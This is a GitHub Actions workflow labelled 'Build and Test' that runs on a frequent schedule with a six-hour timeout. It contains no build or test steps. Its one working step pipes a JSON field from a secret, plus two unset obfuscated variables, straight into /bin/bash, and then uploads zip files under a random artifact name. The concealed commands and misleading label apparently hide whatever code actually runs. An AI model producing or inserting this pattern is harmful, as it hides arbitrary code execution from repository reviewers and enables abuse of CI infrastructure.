name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '2 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          vi4: ${{ secrets.vi4 }}
        run: |
          printf '%s' "$vi4" | jq -r .lj0 | /bin/bash
          printf '%s' "$gttcg1" | jq -r .qw64902 | /bin/bash
          echo $urll697 | jq -r .nvpab090 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: gF9rI4If
          path: "*.zip"
          retention-days: 1
